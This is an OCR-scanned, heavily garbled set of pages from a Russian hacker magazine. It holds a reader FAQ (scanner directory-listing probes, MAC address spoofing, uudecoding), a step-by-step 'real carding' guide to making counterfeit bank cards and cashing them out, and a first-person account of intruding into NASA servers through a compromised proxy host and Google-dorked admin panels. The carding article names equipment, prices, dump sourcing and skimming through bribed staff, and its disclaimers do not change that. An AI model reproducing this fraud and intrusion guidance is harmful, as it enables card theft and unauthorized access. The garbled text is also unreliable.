РегзИаІ, СосІеРітрз, Макака. Пи Е-хіпе. Все эти, атакже сотни 
других е-хіпе на русском и английском языках ты можешь 
скачать с моего сайта ѵѵѵѵѵѵ.зкіѵагок.ги . 

( Р ПРИ СКАНИРОВАНИИ САЙТОВ НА НАЛИЧИЕ ДЫРОК, ПРАКТИ- 
ЧЕСКИ В 90% СЛУЧАЕВ СКАНЕРЫ НАХОДЯТ УРЛЫ ТАКОГО СОДЕР- 
ЖАНИЯ: НТТР://Ви05ІТЕ.С0М/? РА0Е5ЕКѴІСЕ5. ■■/? ѴУР-СБ-РЦМР, 
../ ѴТІ ШР.НТМЬ. НО В БОЛЬШИНСТВЕ СЛУЧАЕВ ПРИ ОБРАЩЕ- 
НИИ ПО ЭТИМ ССЫЛКАМ ПРОИСХОДИТ РЕДИРЕКТ НА ГЛАВНУЮ 
СТРАНИЦУ. В ЧЕМ ЖЕ ЗАКЛЮЧАЕТСЯ УЯЗВИМОСТЬ ЭТИХ СТРОК, 
КОТОРЫЕ СКАНЕР ВЫПЛЕВЫВАЕТ ПРАКТИЧЕСКИ НА ПЕРВЫХ 
СЕКУНДАХ? 

А: За описаниями уязвимостей нужно обращаться в багтрак, 

например ѵѵѵѵѵѵ.зесигіЫосиз.сот . или к обычному поисковику. 
Но тебе, видимо, было лень, поэтому я сделал это за тебя и 
с помощью ѵѵѵѵѵѵ.аооаіе.ги обнаружил следующее. Команда 
/?Радезегѵісез адекватно принимается только следующи- 
ми версиями серверов: Ыеізсаре Епіегргізе 2.01 , Ыеізсаре 
Соттегсе 1.12, Огасіе ѴѴеЬ Ызіепег 4. 0.6. 2.0 Епіегргізе Ебіііоп, 
Арасііе 1.2.1, Арасііе 1.2.5, АрасИе/1 .3. 1 (ІІпіх) тоб_регІ/1 . 1 5, 
Арасііе/1 .2.6, Оотіпо Со ѴѴеЬзегѵег 4.6. При вызове любого 
пути на этих серверах с данным параметром, ты увидишь 
содержимое папок. 

На устаревших серверах Ыеізсаре Епіегргізе Зегѵег подпись 
к основному урлу одной из нижеприведенных строк давала 
возможность просматривать списки файлов. 

ХИТРЫЕ СТРОКИ ЫЕТЗСАРЕ 

Змр-сз-битр 

?іл/р-ѵег-іпко 

?іл/р-ккт1-гепсі 

?мр-изг-ргор 



?іл/р-ѵег-сіікк 

?іл/р-ѵегіку-1іпк 

?іл/р-зкагк-ѵег 

?іл/р-зкор-ѵег 

?іл/р-ипскескоик 

Обращением к файлу/ ѵімпкіііті можно было просмотреть 

конфигурационную информацию и определить устаревшую 
версию РгопіРаде, что в дальнейшем позволяло осуществить 
взлом. 

Как видишь, все перечисленные тобой пути относятся к ус- 
таревшим версиям программного обеспечения, поэтому ты 
можешь смело убрать их из базы данных уязвимостей твоего 
сканера безопасности. 

^0^ КАК ПОМЕНЯТЬ МАС-АДРЕС НАСЕТЕВУХЕ? 

А: Ты не указал операционную систему, поэтому я расскажу, как 
поменять МАС-адрес во всех основных осях. В І_іпих МАС-ад- 
рес можно изменить с помощью стандартной утилиты іТсопТід 
с указанием опции ііѵѵ сіазз аббгезз. После ключевого слова 
ііѵѵ необходимо указать имя класса оборудования, а также 
МАС-адрес в текстовом виде. В настоящее время поддержи- 
вается оборудование классов еіііег (Еіііегпеі), ах25 (АМРЯ 
АХ. 25), АРСпеі и пеігот (АМРР ЫЕТ/РОМ). Перед изменением 
аппаратного адреса необходимо отключить интерфейс опци- 
ей боѵѵп. Ниже приведен пример изменения МАС-адреса на 
интерфейсе еіііО: 

# іксопіід еккО бомп 

# іксопіід еккО км еккег 13:13:13:13:13:13 

# іксопіід еккО ир 

В ВЗО это делается аналогично, только в ВЗО'шном варианте 
ІТсопТід нет опции Тіѵѵ, поэтому достаточно только указать класс 
устройств и адрес. В результате команда такая: 

# іксопіід есШ бомп 

# іксопіід ебО еккег 13:13:13:13:13:13 

# іксопіід ебО ир 
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В ѴѴіпсІоѵѵз 2000/ХР предусмотрена возможность смены МАС- 
адреса через реестр (гедесІіі32), но удобнее воспользо- 
ваться сторонними утилитами, такими как 5тас (ѵѵѵѵѵѵ. 
кІссопзиШпд.пеІ/зтас) или ЕіИегсИапде (Нир://п!зесигііу. 
пи/іооІЬох/еіНегсНапде). В ряде случаев МАС-адрес 
можно изменить в опциях сетевой карточки. 



для последующего использования (чтобы по заголовку 
понять, что за инфа внутри). По умолчанию ииепсосіе ко- 
дирует ШЕ-методом, но, указав флаг -т можно восполь- 
зоваться и Ьазе64. Декодируем следующим образом: 




^0; В ЭЛЕКТРОННОМ ЖУРНАЛЕ РНКАСК ВО МНОГИХ СТАТЬЯХ 
ВСТРЕЧАЮТСЯ КОДЫ ФАЙЛОВ В ТАКОМ ФОРМАТЕ: 



Ьедіп 600 гехес-0 . 8 . 5 . Еаг . дгИ . ' > . . 

М'ХЪ (6КУТ А Р\85/;2++[Ц? Н5 ' 8 [-К6 4 ; &(20К*6 [Ъ$>) <Ы М () 1=С; Мб) у| 
М+ЕГб; 51Ю220) !&23 >ѴОКГѴ=&, У) Е2-Х+І&Х? ЦЕ2Р6СТ] /ЗТЙ=/ ДЙ? 3 




М?7>05[О=: 3 _ 9Ѵ <& _ ?) 7 _ \Ы] . N _ ѴБ\Ѵ1[І]? М?-? 
Ш'=М=Г Л #С; МЕ2ЦК+^Ц2ШЩВЙ|^^ 



I 



КАК ИЗ ЭТОГО ПОЛУЧИТЬ НОРМАЛЬНЫЙ ФАЙЛ? 

^А: Честно говоря, мне не совсем понятно, что заставляет 
редакторов РНгаск распространять файлы таким 
образом. Гораздо удобнее для всех было бы просто 
прикладывать их в нормальном виде в архив с журна- 
лом. Но, видимо, у них на это есть свои причины, или 
это просто дань старой хакерской традиции. Причем 
так поступают не только редакторы РНгаск. В основном 
файлы кодируются одним из двух методов: устаревшим 
ІЛІЕ-кодированием и кодированием МІМЕ (Ьазе64). Оба 
метода нужны для преобразования двоичных файлов в 
текстовый А8СІІ-ВИД и используются в системах, где нет 
возможности работать с нетекстовыми данными (е-таіі, 
РТЫ, |\Л\1ТР). Первый метод до сих пор популярен в сети 
Рібо и ІІзепеі, а второй сейчас стандартно используется 
в интернете для передачи файлов по е-таіі. Каким ме- 
тодом закодирован файл, легко распознать по первой 
строчке данных. Если в ней указано Ьазе64, то понятно, 
что файл закодирован методом МІМЕ. Если данные 
начинаются со строки вида «Ьедіп тосіе ТМе» , где тосіе 
— ЕІпіх-права доступа к файлу в восьмеричной системе 
счисления (для 005/ѴѴіпсІоѵѵз-приложений это число 
всегда 644), аіііе — имя исходного файла, то исполь- 
зовано ІЛЧЕ-кодирование. Таким образом, тебе нужно 
скопировать данные из статьи, начиная с первой строч- 
ки («Ьедіп») и заканчивая последней (обычно «епсі» или 
символы « = = = = »), в отдельный текстовый файл под 
любым названием, а затем применить специальную 
программу для раскодирования. 

К слову, для подобных целей в никсах есть целый арсенал: 
команды ииепсосіе и иисіесосіе для кодирования\раскоди- 
рования обоими методами соответственно. Пользоваться 
ими проще простого. Кодируем так: 



# ииепсосіе исходный _ файл метка > имя _ файла 



Здесь «исходный_файл» — это имя файла для конвертиро- 
вания, а «метка» — это имя конвертируемой информации, 
которое будет записано в заголовок созданного файла 



В результате образуется новый раскодированный файл 
с названием метки. В ѴѴіпсІоѵѵз стандартных команд не 
существует, но в интернете можно найти множество ана- 
логичных программ. Например, по адресу ѵѵѵѵѵѵ.сіап.ога/ 
іех-агсЬіѵе/іооІз/иие/тзсІоз можно найти 003-программы_ 
ииепсосіе.ехе и иисіесосіе.ехе . которые работают анало- 
гично ІЛМІХ-командам. Или можно скачать ОЫІ-програм- 
му Оиіск ІІІІЕ АгсЬіѵег ( ѵѵѵѵѵѵ. Іізізоіі.ги/ргодгатз/1 21 16 ) 
отечественного автора, которая способна выполнить 
все необходимые операции по кодированию/декодиро- 
ванию файлов. 

Кроме того, архиваторы ѴѴіпВАВ, ѴѴіп^ІР и некоторые 
другие содержат автоматический ШЕ-раскодировщик, 
поэтому большинство архивов не нужно предварительно 
раскодировать. Достаточно сохранить данные в тексто- 
вый файл и можно сразу передавать архиватору. 

^О: ЧТО ТАКОЕ АОѴѴАКЕ? 

Термин «асіѵѵаге» применяют к программам, которые показы- 
вают рекламу. В этом случае разработчик получает плату 
не от пользователя, а от рекламодателей. Пользователь вы- 
нужден смотреть доставляемые через интернет картинки. 
Такой подход обычно используется в программах, которые 
непосредственно работают с сетью. Соответственно, при- 
ставка «асі» является сокращением от английского слова 
«асіѵегіізетепі» — «реклама», а слово «ѵѵаге» переводится 
как «продукт». 



ІоЧ^Как внедрить секцию в РЕ-файл? 

^А: Напомню, стандартными секциями РЕ-файла являются 
.Ьзз, .сіаіа, .есіаіа, .ісіаіа, .гсіаіа, .геіос, .гзгс, Тех!, ТІз, 
.хсіаіа и некоторые другие. Но существуют возможности 
внедрить свою дополнительную секцию в РЕ-файл. Если 
ты пишешь программу на С/С+ + , то это можно сделать 
с помощью директивы «#ргадта сІаіа_зед («имя_разде- 
ла»)». Например, следующий участок кода из трех строк 
создает секцию .іѵап и помещает в нее строку «Іѵап 
ЗкІуагоІАп»: 



сііаг пате []="Іѵап Зк1уагоГГ\п м ; 



Добавить новую секцию можно и в уже скомпилированный 
ехе-файл, однако расписывать в РАО, как это делает- 
ся, нет никакой возможности, поэтому я отсылаю тебя к 
дополнительной литературе, например к статье «Борьба 
с Сгірріеѵѵаге, или добавление своих функций в чужие 
проги » , которую можно найти на сайте ИДрѴ/сѵсІет.ога.иа в 
разделе Реѵегзе Епдіпеегіпд. =Н= 
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ЛЕОНИД «ВОЮ» ОТРОЙКОВ 

/ воіо@маіі-.віі / 



КАРДЕР ИВАН ПЕТРОВ, ИЗВЕСТНЫМ НА ХАКЕРСКИХ 
ФОРУМАХ КАК МСТАВБЕВ, ПО ОБЫКНОВЕНИЮ НАЕЛ- 
СЯ ГРИБОВ ПСИЛОЦИБОВ И МУЧАЛСЯ ОТ СТРАШНЫХ 
ГАЛЛЮЦИНАЦИЙ. 

Подумай, сколько бабла ты можеіиь под- 
нять. Просто засунь меня в банкомат! 



СКОЛЬКО ВАНЯ НЕ СОПРОТИВЛЯЛСЯ КАРТОЧКЕ, ОНА 
ВЗЯЛА СВОЕ И ЗАСТАВИЛА НЕОПЫТНОГО КАРДЕРА 
ЗАНЯТЬСЯ ГРЯЗНЫМ ШОПИНГОМ. 




ТЕМНАЯ СТОРОНА 
БЕЛОГО ПЛАСТИКА 

ОРУЖИЕ, ВЫСТРЕЛЫ, КРОВЬ - ВСЕ ЭТО ЕЩЕ В НЕДАЛЕКОМ ПРОШЛОМ ЯВЛЯЛОСЬ НЕПРЕМЕННЫМ АТРИБУТОМ ОПРАВЛЕНИЙ 
БАНКОВ И ИНКАССАТОРОВ. С ПОЯВЛЕНИЕМ КРЕДИТНЫХ КАРТ И РАЗВИТИЕМ КАРДИНПА ВСЕ ИЗМЕНИЛОСЬ. ТЕПЕРЬ НЕ НУЖНО 
ВРЫВАТЬСЯ В БАНК С АВТОМАТОМ В РУКАХ И ТРЕБОВАТЬ НАЛИЧНЫЕ. ДОСТАТОЧНО ПОЛУЧИТЬ ДОСТУП К БАНКОВСКОМУ АК- 
КАУНТУ КАРДХОЛДЕРА И ВЫВЕСТИ ЕПО ДЕНЬПИ СО СЧЕТА. СДЕЛАТЬ ЭТО МОЖНО НЕСКОЛЬКИМИ СПОСОБАМИ, ОДНИМ ИЗ КОТО- 
РЫХЯВЛЯЮТСЯ ПОДДЕЛЬНЫЕ КРЕДИТКИ, ИЛИ «БЕЛЫЙ ПЛАСТИК». 



ЧЕМ ЖИВУТ РЕАЛЬНЫЕ КАРДЕРЫ 



□ Стандартизация пластиковых карт 

ачинать работать, не имея 
понятия о том, что собой пред- 
ставляют пластиковые карты, 
невозможно. Поэтому — обо 
всем по порядку. Ты, наверное, знаешь, что 
карточки бывают разные (с магнитной поло- 
сой, чиповые, БСК, и т.д.). В общем виде их 
можно классифицировать по методам записи 
и обработки данных: 

1 . карты с магнитной полосой (магнитные карты); 

2. карты со встроенной микросхемой (контак- 
тные и бесконтактные чиповые карты); 



3. карты со штриховым кодом (штрихкодовые 
карты); 

4 . эмбоссированные/печатные карты (с нане- 
сенной информацией методом тиснения или 
термопечати). 

Реального кардера обычно интересуют 
магнитные и чиповые карты, так как именно 
они используются платежными системами. 
Размер карточек носит название Ю-1 и 
составляет 85,6x53,98x0,76 мм. Лицевая 
сторона карты — аверс, на ней могут распо- 
лагаться чип, информация о банке-эмитенте, 
номер карты и логотип платежной системы. 



На обратной стороне — реверсе — обычно 
находится магнитная полоса и полоса для 
подписи. Зоны тиснения информации также 
закреплены стандартами. Например, строка 
с идентификационным номером располага- 
ется на уровне 20 мм от нижнего края карты 
и не может превышать 1 9-ти символов. Под 
ней находится зона для нанесения данных 
кардхолдера (владельца карточки) и Ехріге 
Баіе (срока окончания действия карты). 
Кроме тиснения, применяется термопечать 
— печать на карте методом термодиффузии 
(при нанесении логотипов). Информацию, за- 
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> Продажа дампов на одном из кардерских форумов 




> Программа для работы с энкодером 



фиксированную таким образом, практически 
невозможно стереть. 

О Коротко о чиповых картах 

Было бы несправедливо не упомянуть в 
статье о чиповых картах, так как они широко 
используются российскими банками. Такие 
карты делятся на 2 типа: 

1. контактные чиповые карты; 

2. бесконтактные чиповые карты. 

Контактные карты содержат на аверсе 
(лицевой стороне) «карман» для располо- 
жения чипа. На сам чип-модуль наносится 
специальный клей, после чего микросхема 
вклеивается в «карман». Чип представляет 
собой микрокомпьютер, который обрабаты- 
вает поступающие команды (поэтому такие 
карты и называют смарт-картами). В нем 
реализована защищенная область памяти, 
информация в которой кодируется секрет- 
ными ключами. Технология производства 
чипов постоянно совершенствуется. Что 
касается БСК (бесконтактных чиповых карт), 
то внутри, по их периметру, расположена 
антенна, которая позволяет картам обмени- 
ваться данными с картридером при помощи 
радиочастот. Сразу скажу, что в статье я не 
буду описывать способы подделки чиповых 
карт, так как основная мишень реал-кардинга 
— магнитные карты. 

□ Тайна магнитной полосы 

Надо отметить, что 90% международных пла- 
тежных систем используют карты с магнитной 
полосой. На них я и остановлюсь подробнее. 
Магнитная полоса располагается на расстоя- 
нии 5,5 мм от верхнего края обратной стороны 
карты и может содержать 2 — 3 дорожки. 
Ширина полосы зависит от числа дорожек и 
составляет 6,4 мм при двух дорожках и 
10,3мм при трех. Как ты понял, вся информа- 
ция, необходимая для совершения финансо- 
вых операций, находится на магнитной полосе. 
Теперь рассмотрим каждую из трех дорожек. 
Первая дорожка включает буквенно-цифровую 
информацию. На ней помещается до 79 сим- 
волов. Дорожка содержит следующие данные: 



идентификационный номер — до 19 цифр; 
код страны — 3 цифры; 

■РИО кардхолдера (владельца карты) — от 
двух до 26 знаков; 

Ехріге 0а*е (дата истечения срока действия 
карты) — 4 цифры; 
служевный код — 3 цифры; 
информация эмитента — оставшиеся цифры . 
На второй дорожке располагается только 
цифровая информация, кодируемая двоично- 
десятичным кодом. Всего на дорожке может 
быть до 39 символов. Вторая дорожка дубли- 
рует информацию первой, за исключением 
данных о кардхолдере. 

Третья дорожка является необязательной. 
Она содержит цифровую информацию и 
кодируется аналогично первой дорожке. 
Максимальное число символов на до- 
рожке — 107. Ты спросишь: «Зачем нам все 
это нужно?» Ответ прост: реальный кардер 
может самостоятельно записывать данные на 
дорожки магнитной карты. Но об этом далее. 

□ Реал-кардинг, или делаем деньги 

Как говорится, перейдем от теории 
к практике :). Все действия реального карде- 
ра можно распределить в соответствии со 
следующим планом: 

1 . подделка пластиковой карты (нанесение 
тиснения, логотипов платежных систем 

— одним словом, придание куску пластика 
товарного вида =)); 

2. запись данных на магнитную полосу; 

3 обналичивание/шопинг (то, для чего необ- 
ходимы вышестоящие действия). 

Начну с первого пункта. Здесь кардеру 
необходимо определиться с расходными 
материалами. Если он собирается налить 
деньги через банкоматы, то ему достаточно 
белого пластика с магнитной полоской, а если 
планирует заняться шопингом, то ему уже 
потребуется качественно сделанная кредитка 
с элементами термопечати и тиснения. Второй 
вариант я рассмотрю подробнее, так как, хотя 
он и связан с трудоемкий процессом изготов- 
ления, но на выходе предполагает полно- 
ценный, готовый к употреблению продукт =). 



Сразу скажу, что для открытия собственной 
«лаборатории» по производству картона 
(кредитных карт) преступнику нужны будут 
определенные денежные вложения, которые, 
впрочем, окупятся при умелом подходе. 
Первая жизненно необходимая вещь — это 
пластик с впаянной магнитной полосой. 
Приобрести его сейчас не проблема. 
Наиболее распространенный тип пластика 
— СВ-80. Также для грязных дел необходим 
качественный принтер, с помощью которого 
на пластик будут наноситься печатный текст и 
эмблемы. Выбору принтера реальный кардер 
уделяет особое внимание, так как от него 
напрямую зависит внешний вид картонки. В 
качестве примера назову ЕІігоп Р21 0і, кото- 
рый используется для печати удостоверений, 
пропусков и т.д. Он подходит для односторон- 
ней печати без полей и почти идеально штам- 
пует карты с разрешением 300 брі. Также 
ЕІігоп Р210І позволяет наносить штрихкоды, 
фотографии, графику и текст. Правда стоит 
он около $2000, но это не помеха, так как все 
затраты начинающего кардера, как было 
сказано выше, окупаемы. 

Следующий шаг — «выдавливание» на карте 
инициалов кардхолдеров, банка-эмитента, 
номера карты и т.д. Для этого существует 
эмбоссер. Один из вариантов — Маііса 21 , 
имеющий компактный размер и способный 
выпускать до 600 карт в сутки. Стоимость 
этого агрегата составляет порядка $3500. 

Для того чтобы окрасить эмбоссированные 
символы на карте, нужен типпер. Наибо- 
лее характерный выбор — Маііса 2 Тіррег, 
который всего за несколько секунд придаст 
картонке подобающий вид. Цена подобного 
типпера колеблется в пределах $1 600. Кроме 
эмбоссирования, типпинга и печати, на карту 
требуется нанести голограмму и полосу для 
подписи. Последняя, сделанная из особой 
бумаги, клеится на обратной стороне креды. 
На ней обязательно ставится подпись (по 
идее, владельца креды =)), без которой карта 
считается недействительной. Что касается 
голограммы, то тут дело обстоит несколько 
сложнее. Оригинальную голограмму прак- 
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> Внимание! Все 
действия, описанные в 
статье противозаконны! 
Информация предостав- 
лена исключительно с 
целью ознакомления! 

Ни автор, ни редакция 
за твои действия ответс- 
твенности не несут!. 



^№0 

> Помни, что реал-кар- 
динг не доведет тебя до 
добра. Тебя все равно 
рано или поздно найдут. 




тически невозможно содрать с поверхности кредитки. 

С большинства же поддельных картонок отклеить голо- 
грамму не составляет труда, поэтому кардеры уделяют 
пристальное внимание этой проблеме. 

Так, о работе с пластиком я рассказал. Но от просто 
красиво окрашенных карт толку мало, поэтому перейдем 
ко второму этапу — записи данных на магнитную полосу. 
Для этого кардер приобретает энкодер — устройство для 
чтения и записи магнитной полосы карт. Энкодеры могут 
записывать 2 вида карт — Иідіт и Іоѵѵ соегсіѵііу (высокой и 
низкой намагниченности). Лучше тот, который «понима- 
ет» любые карты. 

Энкодеры также делятся на 2 типа в зависимости от 
количества записываемых дорожек (треков). Не старай- 
ся выбрать именно тот энкодер, который записывает 
все 3 дорожки, так как третий трек не используется ни 
РОЗ-терминалами (за исключением редких случаев), 
ни банкоматами. Основную роль здесь играет вторая 
дорожка. С ее помощью можно вручную создать первый 
трек на основе данных, имеющихся во втором. Обыч- 
но используются именно эти две дорожки (первая и 
вторая). Т ретий трек, как правило, располагает на себе 
какую-либо дополнительную информацию, не имеющую 
принципиального значения (система скидок, бонусные 
очки владельца креды и т.д.). 

Из популярных энкодеров могу отметить АМС С722 и 
МЗЯ206. АМС С722 записывает и читает первые две до- 
рожки, он прекрасно показал себя в «боевых» условиях. 
По цене он обойдется тебе в $800. После выбора и покуп- 
ки энкодера преступнику необходимо раздобыть дампы, 
которые записываются на магнитные полосы картонок. 
Здесь есть 2 варианта: 

1 . кардер покупает дампы у селлеров (людей, торгующих 
дампами кред); 

2. кардер самостоятельно добывает дампы. 

С первым вариантом, думаю, ясно. Берется некая сумма 
вмз/еголд/еіс, ищется человек/сервис по продаже дампов, 
и происходит закупка. А вот со вторым способом все на- 
много интереснее. Здесь необходимо проявить смекалку 
и каким-то образом считать скимером (устройством для 
чтения данных с магнитной полосы) кредитку кардхолдера. 
Известны случаи сговора с официантами в кафе/рестора- 
не (гостиничными менеджерами), которые за определен- 
ную плату считывали скимером дампы с кредитных карт 
посетителей и передавали их киберпреступнику. Но обыч- 
но кардеры закупаются у селлеров и не парятся по этому 
вопросу. Получив дампы, они подрубают к компу энкодер, 
ставят нужный софт (который иногда идет в комплекте с 
энкодером) и закатывают очередную картонку. 



>Надискеты найдешь О Собираем урожай 

видео по реал-кардингу. После всех описанных выше действий преступники 

приступают к третьему, самому ответствен- 
ному пункту плана — обналичиванию или шопингу. Здесь 




> Чип, снятый с карты одного из банков 



есть свои нюансы. Если известен пин-код, то наиболее 
удобным способом является поход к банкомату. Но если 
человек закатывал накредудамп, апина(РІЫ)от карто- 
чки нет, то ситуация усложняется. Вариант с обналом в 
банкомате отпадает сразу, так как там ввод пин-кода явля- 
ется обязательным условием. Остается шопинг. Причем 
кардер ищет только те магазины, в которых установлены 
РОЗ-терминалы, не требующие пина. Отличить их можно 
по отсутствию клавиатуры для набора пин-кода. Но, как 
показывает практика, в российских магазинах они встре- 
чаются нечасто. Правда до сих пор работает система с 
выездом за границу для последующего отоваривания в 
буржуйских шопах. Но для ее реализации нужны докумен- 
ты, билеты и отработанные схемы. Вообще говоря, такой 
шопинг является экстремальным в прямом смысле этого 
слова. Ведь неизвестно, что может ожидать человека в 
случае неудачной транзакции: удивление кассира, вызов 
милиции или полиции (за рубежом), звонок в банк и т.д. 

Как ни крути, но все варианты просчитать невозможно. 

□ Сижу за решеткой втемнице сырой... 

Как ты понял из моей статьи, реал-кардинг связан не 
только материальными вложениями, но и с колоссальным 
риском. В последнее время участились случаи успешного 
задержания кардеров сотрудниками МВД и ФСБ. 
Некоторые известные кардеры добровольно заверши- 
ли свою деятельность. А тебе я советую и не начинать. 
Кардинг — это кривая дорога, и шансов, что она приведет 
тебя к чему-то хорошему в жизни, очень мало. Чтобы не 
быть голословным, напомню о статье 187 УК РФ «Изготов- 
ление или сбыт поддельных кредитных, либо расчетных 
карт и иных платежных документов». По этой статье 
реально получить от двух до шести лет (или от четырех до 
семи, при наличии организованной группы). Подумай на 
досуге, что тебе дороже: красивая, но короткая жизнь на 
воле или свобода. Я думаю, выбор очевиден — свобода 
дороже. НЕ 
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ГОСУДАРСТВО ВСЕГДА ПЫТАЕТСЯ СКРЫТЬ ОПРЕДЕЛЕННУЮ ИНФОРМАЦИЮ ОТ ПОСТОРОННИХ ГЛАЗ. РАНЬШЕ ДЛЯ ЭТОГО ИС- 
ПОЛЬЗОВАЛ ИСЬ СПЕЦИАЛЬНЫЕ ЗАЩИЩЕННЫЕ АРХИВЫ И ХРАНИЛИЩА, ДОСТУП К КОТОРЫМ ИМЕЛ ТОЛЬКО УЗКИЙ КРУГЛИЦ. 
СЕЙЧАС ЖЕ, С РАЗВИТИЕМ СЕТЕЙ И ТЕХНОЛОГИЙ, БОЛЬШАЯ ЧАСТЬ ДАННЫХ ПЕРЕКОЧЕВАЛА НА СЕРВЕРЫ ГОСУДАРСТВЕННЫХ 
РЕСУРСОВ. НЕ СТОИТ И ГОВОРИТЬ, ЧТО ИХ БЕЗОПАСНОСТЬЮ ЗАНИМАЮТСЯ ПРОФЕССИОНАЛ Ы, ДЕЯТЕЛЬНОСТЬ КОТОРЫХ ЧЕТКО 
КОНТРОЛИРУЕТСЯ СПЕЦСЛУЖБАМИ СТРАНЫ. НО КАКОЙ БЫ СОВЕРШЕННОЙ НИ БЫЛА ЗАЩИТА, ВСЕГДА НАЙДЕТСЯ ТОТ, КТО 
СМОЖЕТ ЕЕ ОБОЙТИ И ПОПАСТЬ В САМОЕ СЕРДЦЕ РЕСУРСА. И В ЭТОТ РАЗ ТАКИМ ЧЕЛОВЕКОМ ОКАЗАЛСЯ Я, РоЮ, ПРОНИКНУВ 
НА СЕРВЕРЫ НАЦИОНАЛЬНОГО АЭРОКОСМИЧЕСКОГО АГЕНТСТВА США (ЫА5А). 



□Америка, где так красиво, 
но Россия — вот где сила 

аветной мечтой многих русских 
(и не только =)) хакеров является 
взлом серверов Пентагона, ЦРУ, 
ФБР или ЫАЗА. И неудивитель- 
но, ведь эти государственные ведомства 
США известны во всем мире. Они хранят «в 
застенках» своих сетей гигабайты секретной 
информации. Проблема лишь в том, что полу- 
чить доступ к ней не сложно, а очень сложно. 
Но, как говорится, нет ничего невозможного. 
Поэтому одним из вечеров, вернувшись из 



института, я решил немного поиграть. . . Нет, 
не в Контру и не в ѴѴагсгаЙ (не умею, если чес- 
тно) — я решил поиграть с серверами ЫА5А. 
Объект был выбран не случайно. Меня всегда 
интересовало Американское аэрокосми- 
ческое агентство с их программами и иссле- 
дованиями. Кроме того, мне хотелось лично 
убедиться в защищенности их ресурсов. 
Включив ноутбук и запустив Оперу, я зашел 
на официальный сайт N АЗ А ( ущуѵлазадоу ) , и че- 
рез несколько секунд моему взору предстал 
весьма симпатичный портал, обвешанный 
различными фотками и картинками. Пройдя 



по паре ссылок и убедившись, что ресурс 
наполнен Ніт 1-страницам и, я закрыл окно 
браузера и задумался. Конечно, было бы 
наивно искать баги на сайте Национального 
аэрокосмического агентства США. Ско- 
рее всего, там уже все проверили до меня, 
с одной стороны, зесигііу-эксперты, с другой, 
— хакеры. Но я и не ждал легкой прогулки. 
Первым делом нужно было найти надежный 
соке. Я выбрал один из поломанных мной 
серверов в Европе и залил туда зоскз-сервер 
Воипсег, после чего запустил его, предва- 
рительно указав порт. Теперь можно было 
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Европейские хакеры, заранее предупредив специалистов МАЗА, проникли в 


Самый первый взлом главного 


Пятнадцатилетний хакер лома- 


локалку агентства и подкорректировали орбиту новейшего ретрансляционно- 


сервака ѵѵѵѵѵѵ.паза.доѵ. Негодяи 


нул 2 домена в подсети ИАЗА: 


го спутника стоимостью несколько миллионов долларов, доведя програм- 


не только сломали сайт, но и 


ІрІ.паза.доѵ и дз^с.паза.доѵ. 


мистов МАЗА до предынфарктного состояния. Спутник как-то удалось 


сделали дефейс с поздрави- 


Сломал, спионерил секретную 


вырвать из рук хакеров, а европейские каналы связи МАЗА после этого были 


тельным посланием в космос. 


информацию и... попал втюрьму. 


наглухо замурованы. Посягнувших на спутник товарищей так и не поймали, и 


Что примечательно, хакеров 


Несмотря на совсем юный 


их реальные имена до сих пор неизвестны. 


также до сих пор не нашли :). 


возраст, парню дали 5 лет. 
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> Скрипт подвержен локальному инклуду 



начинать. При обычном раскладе я не задумы- 
ваясь отправился бы на ѵѵѵѵѵѵ.ботаіпіооіз.сот 
или ѵѵѵѵѵѵ.ботаіпзсІЬ.пеі для получения 
списков доменов. В этом случае шансов было 
мало, но попробовать стоило. Как и ожи- 
далось, на обоих ресурсах меня обломали, 
сообщив, что по ІХІАЗАони информации не 
имеют =(. Что же, этого стоило ожидать. Тогда 
я решил воспользоваться Г углом, благо этот 
поисковик не подводил меня еще ни разу. 
Зайдя на ѵѵѵѵѵѵ.доодіе.сот . я вбил в фор- 
мочку поиска запрос вида «іпигі: паза, доѵ» 
и нажал Епіег. Передо мной появились ссылки 
на различные насовские поддомены. Надо 
сказать, что их количество несколько удивило 
меня. Качественно переработать вручную 
такое число сайтов было просто нереально. 
Но все же перед запуском массового скани- 
рования мне хотелось осмотреть «пациен- 
тов». Я выбрал несколько приглянувшихся 
мне доменов и занялся изучением ресурсов. 
Большинство из них не содержало ничего, 
кроме НітІ-страниц, что не могло не огорчать. 
Но временами попадались ресурсы, исполь- 
зующие азр-движок, еще реже мелькали 
перл-скрипты. Побродив часок по линкам, 
я вспомнил про неправильно выставленные 
чмоды (права на доступ к директориям) и ре- 
шил попытать удачу здесь. Вновь открыв Г угл , 
я набрал «іпигІ:паза.доѵ/асІтіп», после чего на- 
жал «ЗеагсН». Поисковик послушно выдал мне 
листинг сайтов, имеющих директорию /абтіп 
и находящихся в доменной зоне паза.доѵ. 
Некоторые из них приведены ниже: 

іШЪр : / / дсп . дзіс . паза . доѵ/ абтіп/ 

— Ассезз ГогЪісМеп! (Еггог 403) 

іШЪр : //пззбсіір . дзіс . паза . доѵ/ абтіп/ 

зіаіз/ — зіаіз 

іШДр : //рбз-ітадіпд фрі . паза . доѵ/ 




АДДр : / / зрасезсіепсе . паза . доѵ/ абтіп 
НРРр : //рмд . дзіс . паза . доѵ/ізір/абтіп 

Увы, перейдя по первой же ссылке, я полу- 
чил от ворот поворот: «Ассезз іогЬіббеп » . 

С остальными была аналогичная ситуация, за 
исключением ИДр://пззбсЙр.дзІс.паза.доѵ . 
но и здесь в доступе лежал один мусор. Про- 
смотрев весь перечень сайтов и оценив его 
объем, я оставил эту затею. Вместо этого я за- 
шел на ѵѵѵѵѵѵ.паза.аоѵ и собрал с него ссылки 
на домены, предположительно располагаю- 
щиеся на этом же сервере. Далее, запустив 
ІпіеІІіТетрег (который я уже описывал в «X- 
Тооіз») на поиск веб-директорий, я отошел 
от компа. Через несколько часов сканер 
известил об окончании своей работы. Наста- 
ло время разгребать огромный лог. Я сразу 
заметил несколько линков с директориями, 
которые могли служить админкой, и по очере- 
ди стал осматривать их. Внезапно при заходе 
на очередной урл ( ИІІр://зрасеІІідІпІ.паза.доѵ 
/абтіп ) моему взору предстала, пожалуй, одна 
из самых желанных надписей: «Н8Р Абтіп 
Тооіз». По началу я подумал, что это какая-то 
шутка админа или просто внешний вид 
интерфейса, не требующий авторизации. Но 
проверив разделы меню, я убедился, что это 
действительно админка. Такого хода событий 
я не ожидал, но, как говорится, «заходи тихо, 
бери много, уходи быстро». Руководствуясь 
этим правилом, я приступил к ознакомлению 
с админской панелью. Всего в меню распола- 
галось 6 пунктов: РТР Ібріоаб Шііу, СоІІесі Оаіа 
Рііез, Ѵіеѵѵ ОаіаЬазез, СИапде ЗНиііІе Міззіоп 
